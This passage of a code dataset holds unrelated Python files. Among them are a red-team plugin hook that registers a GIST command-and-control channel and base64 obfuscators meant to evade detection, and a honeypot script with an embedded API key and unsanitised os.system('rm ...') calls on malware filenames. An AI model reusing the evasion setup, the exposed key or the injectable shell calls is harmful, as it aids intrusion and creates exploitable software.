optimalFeatures[1][0][0]][:, optimalFeatures[1][0][1]]\n pixel4 = testingFaces[:, optimalFeatures[1][1][0]][:, optimalFeatures[1][1][1]]\n pixel5 = testingFaces[:, optimalFeatures[2][0][0]][:, optimalFeatures[2][0][1]]\n pixel6 = testingFaces[:, optimalFeatures[2][1][0]][:, optimalFeatures[2][1][1]]\n pixel7 = testingFaces[:, optimalFeatures[3][0][0]][:, optimalFeatures[3][0][1]]\n pixel8 = testingFaces[:, optimalFeatures[3][1][0]][:, optimalFeatures[3][1][1]]\n pixel9 = testingFaces[:, optimalFeatures[4][0][0]][:, optimalFeatures[4][0][1]]\n pixel10 = testingFaces[:, optimalFeatures[4][1][0]][:, optimalFeatures[4][1][1]]\n\n comarisonMatrix = pixel1 > pixel2\n comarisonMatrix2 = pixel3 > pixel4\n comarisonMatrix3 = pixel5 > pixel6\n comarisonMatrix4 = pixel7 > pixel8\n comarisonMatrix5 = pixel9 > pixel10\n\n\n largeBoy = np.array([comarisonMatrix, comarisonMatrix2, comarisonMatrix3, comarisonMatrix4, comarisonMatrix5])\n largerBoy = largeBoy.T.sum(axis=1)\n resultMatrix = largerBoy >= 3\n fpc = 
fPC(resultMatrix, testingLabels)\n return fpc\n\n\n#This function simply shows visually on a sample face where the optimal pixels are. \ndef stepwiseRegression (testingFaces, features):\n show = True\n if show:\n # Show an arbitrary test image in grayscale\n im = testingFaces[0,:,:]\n fig,ax = plt.subplots(1)\n ax.imshow(im, cmap='gray')\n # Show r1,c1\n rect = patches.Rectangle((features[0][0][0] - 0.5, features[0][0][1] - 0.5), 1, 1, linewidth=2, edgecolor='r', facecolor='none')\n ax.add_patch(rect)\n # Show r2,c2\n rect = patches.Rectangle((features[0][1][0] - 0.5, features[0][1][1] - 0.5), 1, 1, linewidth=2, edgecolor='r', facecolor='none')\n ax.add_patch(rect)\n # Display the merged result\n rect = patches.Rectangle((features[1][0][0] - 0.5, features[1][0][1] - 0.5), 1, 1, linewidth=2, edgecolor='b', facecolor='none')\n ax.add_patch(rect)\n # Show r2,c2\n rect = patches.Rectangle((features[1][1][0] - 0.5, features[1][1][1] - 0.5), 1, 1, linewidth=2, edgecolor='b', facecolor='none')\n ax.add_patch(rect)\n rect = patches.Rectangle((features[2][0][0] - 0.5, features[2][0][1] - 0.5), 1, 1, linewidth=2, edgecolor='g', facecolor='none')\n ax.add_patch(rect)\n # Show r2,c2\n rect = patches.Rectangle((features[2][1][0] - 0.5, features[2][1][0] - 0.5), 1, 1, linewidth=2, edgecolor='g', facecolor='none')\n ax.add_patch(rect)\n\n rect = patches.Rectangle((features[3][0][0] - 0.5, features[3][0][1] - 0.5), 1, 1, linewidth=2, edgecolor='y', facecolor='none')\n ax.add_patch(rect)\n # Show r2,c2\n rect = patches.Rectangle((features[3][1][0] - 0.5, features[3][1][0] - 0.5), 1, 1, linewidth=2, edgecolor='y', facecolor='none')\n ax.add_patch(rect)\n\n rect = patches.Rectangle((features[4][0][0] - 0.5, features[4][0][1] - 0.5), 1, 1, linewidth=2, edgecolor='k', facecolor='none')\n ax.add_patch(rect)\n # Show r2,c2\n rect = patches.Rectangle((features[4][1][0] - 0.5, features[4][1][0] - 0.5), 1, 1, linewidth=2, edgecolor='k', facecolor='none')\n ax.add_patch(rect)\n\n 
plt.show()\n \n\nif __name__ == \"__main__\":\n #Load the training and testing data\n testingFaces, testingLabels = loadData(\"test\")\n trainingFaces, trainingLabels = loadData(\"train\")\n\n # Here a simple loop will test various sizes of training set {400, 800, 1200, 1600, 2000}\n for val in [400, 800, 1200, 1600, 2000]:\n\n print(\"\\n\\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n\")\n print(\"Traing data using size of -> \", val)\n print(\"...\\n\")\n features = []\n highestFPC = 0\n for x in range(5):\n print(\"Feature number \" + str(x + 1) + \" ==>\")\n param, highestFPC = measureAccuracyOfPredictors(trainingFaces[:val], trainingLabels[:val], features)\n features.append(param)\n print(\"Calculating next pair of pixles ...\\n\")\n print(\"These are the final featuers: \", features)\n print(\"The final FPC from the training set was : \", highestFPC)\n print(\"\\nNow we will calculate the FPC on the testing set ...\\n\")\n # When we test, regardless of the training set's size, we need to use the full testing matrix\n stepwiseRegression(testingFaces, features)\n accuracy = testModel(features, testingFaces, testingLabels)\n print(\"The FPC for the testing set is : \", accuracy)\n","sub_path":"step-wise.py","file_name":"step-wise.py","file_ext":"py","file_size_in_byte":10855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"627680101","text":"def validar_entero(n):\n if (isinstance(n, int)):\n return True\n else:\n return False\n\ndef validar_rango(n, ri, rf):\n if ( validar_entero(n) == True):\n if (n >= ri and n <= rf):\n return True\n else:\n return False\n else:\n return False\n\ndef pedir_numero(msg, ri, rf):\n n=\"\"\n while( validar_rango(n, ri, rf) == False):\n n=input(msg)\n n = int(n)\n #fin_while\n return n\n#fin_pedir_numero\n\ndef validar_nombre(nombre):\n if ( isinstance(nombre, str)):\n if (len(nombre) >= 3):\n return True\n else:\n return False\n else:\n return False\n\ndef 
pedir_nombre(msg):\n nombre=\"\"\n while ( validar_nombre(nombre) == False ):\n nombre=input(msg)\n #fin_while\n return nombre\n#fin_pedir_nombre\n\ndef guardar_datos(nombre_archivo, contenido, modo):\n archivo=open(nombre_archivo, modo)\n archivo.write(contenido)\n archivo.close()\n\ndef obtener_datos(nombre_archivo):\n archivo=open(nombre_archivo)\n contenido = archivo.read()\n archivo.close()\n return contenido\n\ndef obtener_datos_lista(nombre_archivo):\n archivo=open(nombre_archivo)\n lista = archivo.readlines()\n archivo.close()\n return lista\n\ndef validar_telefono(telf):\n if (isinstance(telf,int)):\n if(len(str(telf)) == 9):\n if(telf > 0):\n return True\n else:\n return False\n\n else:\n return False\n\n else:\n return False\n\ndef pedir_telf(nota):\n telf = 1457889989989\n while (validar_telefono(telf) == False):\n telf = int(input(nota))\n return telf\n\ndef validar_dni(dni):\n if (isinstance(dni,int)):\n if (len(str(dni)) == 8):\n return True\n else:\n return False\n else:\n return False\n\ndef pedir_DNI(nota):\n DNI = \"\"\n while (validar_dni(DNI) == False):\n DNI = int(input(nota))\n return DNI\n\ndef validar_real(real):\n if (isinstance(real,float)):\n return True\n else:\n return False\n\ndef pedir_real(nota):\n r = 2\n while (validar_real(r) == False):\n r = float(input(nota))\n return r\n\ndef validar_ruc(ruc):\n if (isinstance(ruc,int)):\n if (len(str(ruc)) == 11):\n return True\n else:\n return False\n else:\n return False\n\ndef pedir_ruc(nota):\n ruc = 0\n while (validar_ruc(ruc) == False):\n ruc = int(input(nota))\n return ruc\n\ndef validar_talla(talla):\n if (isinstance(talla,float)):\n if( talla >= 1.10 and talla <= 2.50):\n return True\n else:\n return False\n else:\n return False\n\ndef pedir_talla(nota):\n t = \"\"\n while (validar_talla(t) == False):\n t = float(input(nota))\n return t\n\ndef validar_codigo(codigo):\n # 1. 
Revisar que el nro de octetos sea 4\n data=codigo.split(\".\")\n if ( len(data) != 2):\n return False\n\n cod1 = data[0]\n cod2 = data[1]\n if ( cod1.isdigit() == False or cod2.isdigit() == True):\n return False\n\n # 4. Si llego hasta aqui, es porque es un IP valido\n return True\n\ndef pedir_codigo(nota):\n codigo_invalido=True\n while( codigo_invalido == True ):\n codigo=input(nota)\n codigo_invalido = ( validar_codigo(codigo) == False)\n #fin_while\n return codigo\n\ndef validar_estacion(estacion):\n if (estacion == \"VERANO\" or estacion == \"INVIERNO\" or\n estacion == \"PRIMAVERA\" or estacion == \"OTONO\" or\n estacion == \"verano\" or estacion == \"invierno\" or\n estacion == \"primavera\" or estacion == \"otono\" ):\n return True\n else:\n return False\n\ndef pedir_estacion(msg):\n estacion=\"\"\n while ( validar_estacion(estacion) == False ):\n estacion=input(msg)\n #fin_while\n return estacion\n\ndef validar_pecado(pecado):\n if (pecado == \"IRA\" or pecado== \"ENVIDIA\" or\n pecado == \"PEREZA\" or pecado== \"AVARICIA\" or\n pecado == \"LUJURIA\" or pecado == \"GULA\" or\n pecado == \"ORGULLO\" or pecado == \"ira\" or\n pecado == \"envidia\" or pecado== \"pereza\" or\n pecado == \"avaricia\" or pecado== \"lujuria\" or\n pecado == \"gula\" or pecado == \"orgullo\" ):\n return True\n else:\n return False\n\ndef pedir_pecado(msg):\n pecado=\"\"\n while ( validar_pecado(pecado) == False ):\n pecado=input(msg)\n #fin_while\n return pecado\n\n\ndef validar_dia(dia):\n if (dia == \"LUNES\" or dia== \"MARTES\" or\n dia == \"MIERCOLES\" or dia == \"JUEVES\" or\n dia == \"VIERNES\" or dia == \"SABADO\" or\n dia == \"DOMINGO\" or dia == \"lunes\" or\n dia == \"martes\" or dia == \"miercoles\" or\n dia == \"jueves\" or dia == \"viernes\" or\n dia == \"sabado\" or dia == \"domingo\" ):\n return True\n else:\n return False\n\ndef pedir_dia(msg):\n dia=\"\"\n while ( validar_dia(dia) == False ):\n dia=input(msg)\n #fin_while\n return dia\n\ndef validar_peso(peso):\n 
if (isinstance(peso,float)):\n if( peso >= 20.0 and peso <= 100.0):\n return True\n else:\n return False\n else:\n return False\n\ndef pedir_peso(nota):\n p = \"\"\n while (validar_peso(p) == False):\n p = float(input(nota))\n return p\n","sub_path":"CASTILLO/SUBMENUS/libreria2.py","file_name":"libreria2.py","file_ext":"py","file_size_in_byte":5248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"382800577","text":"import random\n\ndef createlist(n):\n n=int(n)#\n return list(random.uniform(0,100)*random.randint(-1,1) for i in range(n) )\n\ndef createlis(n):\n n=int(n)#\n return list(random.randint(0,100)*random.randint(-1,1) for i in range(n) )\n\ndef fTask(n):\n Neg=0\n Arr = createlist(n)\n Mult=1\n Min=9^99\n Max = -9^99\n for iD in Arr:\n if iD < 0:\n Neg += iD\n\n if Min > iD:\n Min = iD\n Mind=Arr.index(iD)\n if Max < iD:\n Max = iD\n Mxid = Arr.index(iD)\n if Mind0:\n lastPos = i\n if lastPos != -1:\n for i in range(0,lastPos):\n SumOfPos+=Arr[i]\n print(Arr)\n print(SumOfPos)\ndef main():\n n=10\n fTask(n)\n ThTask(n)\nif __name__ == '__main__':\n main()\n","sub_path":"prog/addition_task.py","file_name":"addition_task.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"305729162","text":"from app.objects.c_obfuscator import Obfuscator\nfrom plugins.stockpile.app.contact.gist import GIST\nfrom plugins.stockpile.app.stockpile_svc import StockpileService\n\nname = 'Stockpile'\ndescription = 'A stockpile of abilities, adversaries, payloads and planners'\naddress = None\n\n\nasync def enable(services):\n stockpile_svc = StockpileService(services)\n await stockpile_svc.file_svc.add_special_payload('mission.go', stockpile_svc.dynamically_compile)\n await stockpile_svc.data_svc.load_data(directory='plugins/stockpile/data')\n\n c2_configs = await 
stockpile_svc.load_c2_config(directory='plugins/stockpile/data/contact')\n await stockpile_svc.contact_svc.register(GIST(services, c2_configs['GIST']))\n await stockpile_svc.data_svc.store(\n Obfuscator(name='plain-text',\n description='Does no obfuscation to any command, instead running it in plain text',\n module='plugins.stockpile.app.obfuscators.plain_text')\n )\n await stockpile_svc.data_svc.store(\n Obfuscator(name='base64',\n description='Obfuscates commands in base64',\n module='plugins.stockpile.app.obfuscators.base64_basic')\n )\n await stockpile_svc.data_svc.store(\n Obfuscator(name='base64jumble',\n description='Obfuscates commands in base64, then adds characters to evade base64 detection. '\n 'Disclaimer: this may cause duplicate links to run.',\n module='plugins.stockpile.app.obfuscators.base64_jumble')\n )\n","sub_path":"hook.py","file_name":"hook.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"4383032","text":"import csv\nimport cv2\nfrom os import listdir\nimport os.path as op\nimport numpy as np\nimport h5py\nimport tensorflow\n\n# white_list = ['map_1_backward_1']\nwhite_list = []\ndata_dir_name = 'my_data'\nimg_dir_name = 'IMG'\ndata_dir = '../' + data_dir_name\nlog_name = 'driving_log.csv'\n\n\ndef add_image(image, measurement, images, measurements):\n image_flip, measurement_flip = flip_image(image, measurement)\n\n images.append(image)\n measurements.append(measurement)\n images.append(image_flip)\n measurements.append(measurement_flip)\n\ndef flip_image(image, measurement):\n image_flipped = np.fliplr(image)\n measurement_flipped = -measurement\n return image_flipped, measurement_flipped\n\ndef get_image(path):\n path = image_paths_prefix[i] + '/' + img_dir_name + '/' + path.split(img_dir_name)[1]\n return cv2.imread(path)\n\n\nlines = []\nimage_paths_prefix = []\nsubdirs = [op.join(data_dir, f) for f in listdir(data_dir) if 
op.isdir(op.join(data_dir, f))]\nfor dir in subdirs:\n if white_list and op.basename(dir) not in white_list:\n continue\n log_file = op.join(dir, log_name)\n if (not op.isfile(log_file)):\n continue\n with open(log_file) as log:\n reader = csv.reader(log)\n for line in reader:\n lines.append(line)\n image_paths_prefix.append(dir)\n\nimages = []\nmeasurements = []\nfor i in range(len(lines)):\n line = lines[i]\n\n center_image = get_image(line[0])\n left_image = get_image(line[1])\n right_image = get_image(line[2])\n\n correction = 0.2\n center_steering = float(line[3])\n add_image(center_image, center_steering, images, measurements)\n add_image(left_image, center_steering + correction, images, measurements)\n add_image(right_image, center_steering - correction, images, measurements)\n\n\n\n # left_steering = center_steering + correction\n # right_steering = center_steering - correction\n #\n # images.append(center_image)\n # images.append(left_image)\n # images.append(right_image)\n # measurements.append(center_steering)\n # measurements.append(left_steering)\n # measurements.append(right_steering)\n #\n # center_image_flip, center_steering_flip = flip_image(center_image, center_steering)\n\n\n # image_flipped = np.fliplr(center_image)\n # measurement_flipped = -center_steering\n\nX_train = np.array(images)\ny_train = np.array(measurements)\n\nfrom keras.models import Sequential\nfrom keras.layers import Flatten, Dense, Convolution2D, MaxPooling2D, Cropping2D, Lambda\n\nmodel = Sequential()\nmodel.add(Lambda(lambda x: (x / 255.0) - 0.5, input_shape=(160, 320, 3)))\nmodel.add(Cropping2D(cropping=((70, 25), (0, 0)), input_shape=(3, 160, 320)))\n\nmodel.add(Convolution2D(24, 5, 5, subsample=(2, 2), activation='relu'))\nmodel.add(Convolution2D(36, 5, 5, subsample=(2, 2), activation='relu'))\nmodel.add(Convolution2D(48, 5, 5, subsample=(2, 2), activation='relu'))\nmodel.add(Convolution2D(64, 3, 3, activation='relu'))\nmodel.add(Convolution2D(64, 3, 3, 
activation='relu'))\nmodel.add(Flatten())\nmodel.add(Dense(100))\nmodel.add(Dense(50))\nmodel.add(Dense(10))\nmodel.add(Dense(1))\n\n# model.add(Convolution2D(6, 5, 5, activation='relu'))\n# model.add(MaxPooling2D())\n# model.add(Convolution2D(6, 5, 5, activation='relu'))\n# model.add(MaxPooling2D())\n# model.add(Flatten())\n# model.add(Dense(128))\n# model.add(Dense(64))\n# model.add(Dense(1))\n\n\n# model.add(Flatten())\n# model.add(Dense(128, activation='relu'))\n# model.add(Dense(64, activation='relu'))\n# model.add(Dense(16, activation='relu'))\n# model.add(Dense(1))\n\nmodel.compile(loss='mse', optimizer='adam')\nmodel.fit(X_train, y_train, validation_split=0.2, shuffle=True, nb_epoch=3, batch_size=128)\n\nmodel.save('model.h5')\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"247192950","text":"#!/usr/bin/env python\r\n# coding: utf-8\r\n\r\nfrom __future__ import print_function\r\nimport hashlib\r\nimport requests\r\nimport json\r\nimport pygeoip\r\nimport time\r\nimport os\r\nfrom virus_total_apis import PublicApi as VirusTotalPublicApi\r\n\r\nrawdata = pygeoip.GeoIP('GeoLiteCity/GeoLiteCity.dat')\r\nAPI_KEY = '<** INSERT API KEY HERE **>'\r\nvt = VirusTotalPublicApi(API_KEY)\r\n\r\nmd5_ok = []\r\n\r\ndef ipquery(ip):\r\n data = rawdata.record_by_name(ip)\r\n country = data['country_name']\r\n city = data['city']\r\n result = str(str(city)+', ' +str(country))\r\n return(result)\r\n\r\ndef md5(fname):\r\n hash_md5 = hashlib.md5()\r\n with open(fname, \"rb\") as f:\r\n for chunk in iter(lambda: f.read(4096), b\"\"):\r\n hash_md5.update(chunk)\r\n return hash_md5.hexdigest()\r\n\r\nFichList = [ f for f in os.listdir('.') if os.path.isfile(os.path.join('.',f)) ]\r\nfor elements in FichList:\r\n\r\n if elements == \"HoneyBot.py\":\r\n pass\r\n else:\r\n\r\n # hash = md5(elements)\r\n hash = 
\"1cb3d083255c29501c6300db54164aeb\"\r\n\r\n if hash in md5_ok:\r\n print(\"[-] Fichier déja scanné.\")\r\n os.system('rm ' + elements)\r\n else :\r\n\r\n print(\"[+] Nouveau fichier : \" + str(hash))\r\n\r\n response = vt.get_file_report(hash)\r\n re = str(json.dumps(response, sort_keys=False, indent=4))\r\n\r\n if \"The requested resource is not among the finished, queued or pending scans\" in str(re):\r\n print(\"[+] new sample found : \" + str(elements))\r\n pass\r\n else:\r\n\r\n total = re.split('\"total\": ')[1][0:2]\r\n positive = re.split('\"positives\": ')[1][0:2]\r\n hash_md5 = hash\r\n hash_sha = re.split('\"sha256\": \"')[1].replace('\"', '')[0:64]\r\n score = str(positive) + \"/\" + str(total)\r\n r = requests.get('http://209.97.129.92/api/feed/?api_key=5e46d9260f4a422082b4c8472688120c&channel=dionaea.capture')\r\n infos_brute = r.text\r\n print(infos_brute)\r\n info = infos_brute.find(hash)\r\n add = infos_brute[info + 33 : info + 70].replace('\"saddr\": \"','').replace('\"','').replace(\" \",\"\").replace(\",\",'').replace(\"\\n\",\"\")\r\n port = infos_brute[info - 25 : info - 8].replace('\"',\"\").replace(\",\",\"\").replace(\"\\n\",\"\")\r\n capture_date = infos_brute[info + 259 : info + 310].replace('time\": \"',\"\").replace('\"',\"\").replace(',','').replace(\"\\n\",'')\r\n try :\r\n location = ipquery(add)\r\n commentaire = \" === Malware sample collect by my Honeypot === \\n Capture date : \" + capture_date + \"\\n\" + \"Md5 : \" + hash_md5 + \"\\n\" + \"Sha256 : \" + hash_sha + \"\\n\" + \"Score : \" + positive + \"/\" + total + \"\\n\" + \"Port : \" + port + \"\\n\" + \"IP source : \" + add + \"\\n\" + \"Location : \" + location\r\n location_ok = True\r\n except:\r\n commentaire = \" === Malware sample collect by my Honeypot === \\n Capture date : \" + capture_date + \"\\n\" + \"Md5 : \" + hash_md5 + \"\\n\" + \"Sha256 : \" + hash_sha + \"\\n\" + \"Score : \" + positive + \"/\" + total + \"\\n\" + \"Port : \" + port + \"\\n\" + \"IP source 
: \" + add + \"\\n\" + \"Location : \" + \"-\"\r\n location_ok = False\r\n print(\"Malware sample collect by my Honeypot = \")\r\n print(\"Capture date : \" + capture_date)\r\n print(\"Md5 : \" + hash_md5)\r\n print(\"Sha256 : \" + hash_sha)\r\n print(\"Score : \" + positive + \"/\" + total)\r\n print(\"Port : \" + port)\r\n print(\"IP source : \" + add)\r\n if location_ok == True:\r\n print(\"Location : \" + location)\r\n else:\r\n print(\"Location : \" + \"-\")\r\n print(\"========================================\")\r\n\r\n params = {\r\n 'apikey': API_KEY,\r\n 'resource': hash_md5,\r\n 'comment': str(commentaire)\r\n }\r\n\r\n response = requests.post('https://www.virustotal.com/vtapi/v2/comments/put', params=params)\r\n response_json = response.json()\r\n\r\n md5_ok.append(hash_md5)\r\n os.system('mv ' + elements + ' archive/')\r\n time.sleep(20)\r\n","sub_path":"HoneyBot.py","file_name":"HoneyBot.py","file_ext":"py","file_size_in_byte":4359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"212023520","text":"\"\"\" Compiled: 2020-09-18 10:38:52 \"\"\"\n\n#__src_file__ = \"extensions/frtb/./etc/FRTBIMAPLExport.py\"\n\"\"\"----------------------------------------------------------------------------\nMODULE\n (c) Copyright 2017 FIS Front Arena. 
All rights reserved.\n\nDESCRIPTION\n\n----------------------------------------------------------------------------\"\"\"\nimport re\n\nimport acm\n\nimport FRTBExport\nimport FRTBBaseWriter\nimport FRTBCommon\nimport FRTBUtility\n\n# Writers\nclass PLResultsCollector(FRTBBaseWriter.ResultsCollector):\n COLUMN_IDS = (\n FRTBCommon.IMA_PL_HYPOTHETICAL_COLUMN_ID,\n FRTBCommon.IMA_PL_ACTUAL_COLUMN_ID,\n FRTBCommon.IMA_PL_RISK_COLUMN_ID\n \n )\n _USE_PROJECTION_COORDINATES = False\n\nclass PLHypWriter(FRTBBaseWriter.Writer):\n COLUMN_IDS = (FRTBCommon.IMA_PL_HYPOTHETICAL_COLUMN_ID,)\n OUTPUT_SUB_DIR = 'pl_hypothetical'\n _MEASUREMENT_RISK_FACTOR_ATTRIBUTES = (\n 'ID', 'Group', 'Sub Group', 'Type'\n )\n\n def _createHeader(self):\n header = []\n prefix = 'Factor.'\n for label in self._MEASUREMENT_RISK_FACTOR_ATTRIBUTES:\n header.append(prefix + label)\n\n header.extend(self._getDefaultTradeHeader())\n header.append('Profit and Loss')\n return header\n\n def _getRows(self, header):\n measurement = self._getResultsFilters()[0]\n rows = []\n risk_factors = ['Residual'] * len(self._MEASUREMENT_RISK_FACTOR_ATTRIBUTES)\n idx_group = self._MEASUREMENT_RISK_FACTOR_ATTRIBUTES.index('Group')\n risk_factors[idx_group] = 'Other'\n for trade_attrs, measurements in self._results_iterator:\n result = measurements[measurement].Number()\n if result:\n result = str(result)\n trade_attrs = self._getDefaultTradeAttributes(\n trade_attrs=trade_attrs\n )\n row_id = ','.join(risk_factors + trade_attrs[:-1])\n if not self._omitResult(result, measurement, row_id):\n row = risk_factors + trade_attrs + [result]\n rows.append(row)\n\n return rows\n\n def _getResultsFilters(self):\n measurement = re.split(r' |\\-', self.CALC_NAME)[0]\n return (measurement,)\n\n\nclass PLActWriter(FRTBBaseWriter.Writer):\n COLUMN_IDS = (FRTBCommon.IMA_PL_ACTUAL_COLUMN_ID,)\n OUTPUT_SUB_DIR = 'pl_actual'\n _MEASUREMENT_RISK_FACTOR_ATTRIBUTES = (\n 'ID', 'Group', 'Sub Group', 'Type'\n )\n\n def _createHeader(self):\n 
header = []\n prefix = 'Factor.'\n for label in self._MEASUREMENT_RISK_FACTOR_ATTRIBUTES:\n header.append(prefix + label)\n\n header.extend(self._getDefaultTradeHeader())\n header.append('Profit and Loss')\n header.append('P&L Source')\n return header\n\n def _getRows(self, header):\n measurement = self._getResultsFilters()[0]\n rows = []\n risk_factors = ['Residual'] * len(self._MEASUREMENT_RISK_FACTOR_ATTRIBUTES)\n idx_group = self._MEASUREMENT_RISK_FACTOR_ATTRIBUTES.index('Group')\n risk_factors[idx_group] = 'Other'\n for trade_attrs, measurements in self._results_iterator:\n result = measurements[measurement].Number()\n if result:\n result = str(result)\n trade_attrs = self._getDefaultTradeAttributes(\n trade_attrs=trade_attrs\n )\n row_id = ','.join(risk_factors + trade_attrs[:-1] + ['Actual'])\n if not self._omitResult(result, measurement, row_id):\n row = risk_factors + trade_attrs + [result] + ['Actual']\n rows.append(row)\n\n return rows\n\n def _getResultsFilters(self):\n measurement = re.split(r' |\\-', self.CALC_NAME)[0]\n return (measurement,)\n\n\nclass PLRiskWriter(PLHypWriter):\n CALC_NAME = CALC_NAME_LONG = None\n COLUMN_IDS = (FRTBCommon.IMA_PL_RISK_COLUMN_ID,)\n OUTPUT_SUB_DIR = 'pl_risk_theoretical'\n _MEASUREMENT_RISK_FACTOR_ATTRIBUTES = \\\n PLHypWriter._MEASUREMENT_RISK_FACTOR_ATTRIBUTES + (\n 'Commodity', 'Credit Quality', 'Location', 'Grade'\n )\n\n\n# Exporters\nclass PLExport(FRTBExport.Export):\n _END_DATE_REQUIRED = True\n RESULTS_COLLECTOR_CLASS = PLResultsCollector\n\n def __init__(self):\n super(PLExport, self).__init__()\n self._long_name = self.CALC_NAME_LONG.split(' ', 5)[-1]\n self._tab_suffix = 'PL ' + self._long_name\n self._end_date_required = int(bool(self._END_DATE_REQUIRED))\n self._long_name += ' P&L'\n\n def getAelVariables(self):\n ttCalculate = 'Generate %s values.' 
% self._long_name.lower()\n self._ael_vars.append(\n super(PLExport, self).getPerformCalculationAelVariable(\n calc_name=self._long_name, tab_suffix=self._tab_suffix,\n tooltip=ttCalculate\n )\n )\n self._ael_vars.extend(self._getScenarioAelVariables())\n return self._ael_vars\n\n def makeColumns(self, parameters):\n calendar = parameters['scenarioCalendar']\n end_date_str = parameters[self.CALC_NAME + 'oneDayScenarioEndDate']\n start_date, end_date = self._getScenarioDates(\n parameters=parameters, end_date_str=end_date_str, calendar=calendar\n )\n columns = super(PLExport, self).makeColumns(parameters=parameters)\n column_params = {\n acm.FSymbol('PortfolioProfitLossStartDate'): 'Custom Date',\n acm.FSymbol('PortfolioProfitLossStartDateCustom'): start_date,\n acm.FSymbol('PortfolioProfitLossEndDate'): 'Custom Date',\n acm.FSymbol('PortfolioProfitLossEndDateCustom'): end_date,\n }\n columns = self._getColumns(\n parameters=parameters, column_params=column_params,\n start_date=start_date, end_date=end_date\n )\n return columns\n\n def _getScenarioAelVariables(self):\n ttEndDate = 'The end date to use in the external scenario file.'\n ael_var = [self.CALC_NAME + 'oneDayScenarioEndDate',\n 'Scenario end date_' + self._tab_suffix,\n 'string', FRTBCommon.DEFAULT_DAYS, 'Today',\n self._end_date_required, 0, ttEndDate\n ]\n return [ael_var]\n\n def _getScenarioDates(self, parameters, end_date_str, calendar):\n raise NotImplementedError\n\n def _getColumns(self, parameters, column_params, start_date, end_date):\n raise NotImplementedError\n\nclass PLHypExport(PLExport):\n WRITER_CLASSES = (PLHypWriter,)\n\n def _getScenarioDates(self, parameters, end_date_str, calendar):\n end_date = FRTBUtility.getAcmDateFromString(end_date_str, calendar)\n start_date = calendar.AdjustBankingDays(end_date, -1)\n return start_date, end_date\n\n def _getColumns(self, parameters, column_params, start_date, end_date):\n column = self.makeColumn(\n 
column_id=FRTBCommon.IMA_PL_HYPOTHETICAL_COLUMN_ID,\n column_name=self.CALC_NAME, params=column_params\n )\n return [column]\n\nclass PLActExport(PLExport):\n #_END_DATE_REQUIRED = False\n WRITER_CLASSES = (PLActWriter,)\n\n def _getScenarioDates(self, parameters, end_date_str, calendar):\n end_date = FRTBUtility.getAcmDateFromString(end_date_str, calendar)\n start_date = calendar.AdjustBankingDays(end_date, -1)\n return start_date, end_date\n\n def _getColumns(self, parameters, column_params, start_date, end_date):\n column = self.makeColumn(\n column_id=FRTBCommon.IMA_PL_ACTUAL_COLUMN_ID,\n column_name=self.CALC_NAME, params=column_params\n )\n return [column]\n\n\nclass PLRiskExport(PLExport):\n _END_DATE_REQUIRED = False\n WRITER_CLASSES = (PLRiskWriter,)\n\n def _getScenarioAelVariables(self):\n scenarioFileSelection = FRTBExport.getInputFileSelector()\n ttScenarioFile = (\n 'The name or path to an external file contain 1-day scenario file.'\n )\n ael_vars = [\n #[VariableName,\n # DisplayName,\n # Type, CandidateValues, Default,\n # Mandatory, Multiple, Description, InputHook, Enabled]\n [self.CALC_NAME + 'oneDayScenarioFile',\n 'Risk theoretical scenario file_' + self._tab_suffix,\n scenarioFileSelection, None, scenarioFileSelection,\n 0, 1, ttScenarioFile, None, True],\n ] + super(PLRiskExport, self)._getScenarioAelVariables()\n return ael_vars\n\n def _getScenarioDates(self, parameters, end_date_str, calendar):\n assert parameters.get(self.CALC_NAME + 'oneDayScenarioFile'), \\\n self.CALC_NAME_LONG + ' scenario file required'\n start_date = end_date = None\n if end_date_str:\n end_date = FRTBUtility.getAcmDateFromString(end_date_str, calendar)\n start_date = calendar.AdjustBankingDays(end_date, -1)\n\n scenario_file = parameters[self.CALC_NAME + 'oneDayScenarioFile']\n scenario_details = FRTBUtility.getScenarioDetails(\n scenario_file=str(scenario_file).strip(),\n first_end_date=end_date_str, last_end_date=end_date_str,\n horizon=1, calendar=calendar\n )\n 
assert len(scenario_details) == 1, \\\n 'Expected to retrieve only a single scenario column'\n sd = scenario_details[0]\n assert (not start_date) or (start_date == sd.start_date), \\\n 'Start date incorrectly determined'\n assert (not end_date) or (end_date == sd.end_date), \\\n 'End date incorrectly determined'\n end_date = end_date if start_date else sd.end_date\n start_date = start_date or sd.start_date\n return start_date, end_date\n\n def _getColumns(self, parameters, column_params, start_date, end_date):\n scenario_file = parameters[self.CALC_NAME + 'oneDayScenarioFile']\n scenario_params = {\n acm.FSymbol('Scenario File'): str(scenario_file).strip(),\n acm.FSymbol('Scenario End Date'): 'Custom Date',\n acm.FSymbol('Scenario End Date Custom'): end_date,\n acm.FSymbol('Calendar'): parameters['scenarioCalendar'],\n acm.FSymbol('Risk Factor Setup'): parameters['riskFactorSetup']\n }\n scenario = self.makeDynamicScenario(\n template_name='FRTBRiskTheoreticalPLScenarioFromFile',\n scenario_params=scenario_params\n )\n scenario_dimension_names = ['Scenario File Scenario']\n column = self.makeColumn(\n column_id=FRTBCommon.IMA_PL_RISK_COLUMN_ID,\n column_name=self.CALC_NAME,\n scenario=scenario, params=column_params,\n dimension_names=scenario_dimension_names\n )\n return [column]\n","sub_path":"Extensions/FRTB Export/FPythonCode/FRTBIMAPLExport.py","file_name":"FRTBIMAPLExport.py","file_ext":"py","file_size_in_byte":10784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"632576533","text":"import os\nimport requests\nimport json\nfrom flask import Flask, request\nfrom dotenv import load_dotenv\nload_dotenv()\n\napp = Flask(__name__)\n\nFB_API_URL = 'https://graph.facebook.com/v2.6/me/messages'\nVERIFY_TOKEN = os.getenv('VERIFY_TOKEN')\nPAGE_ACCESS_TOKEN = 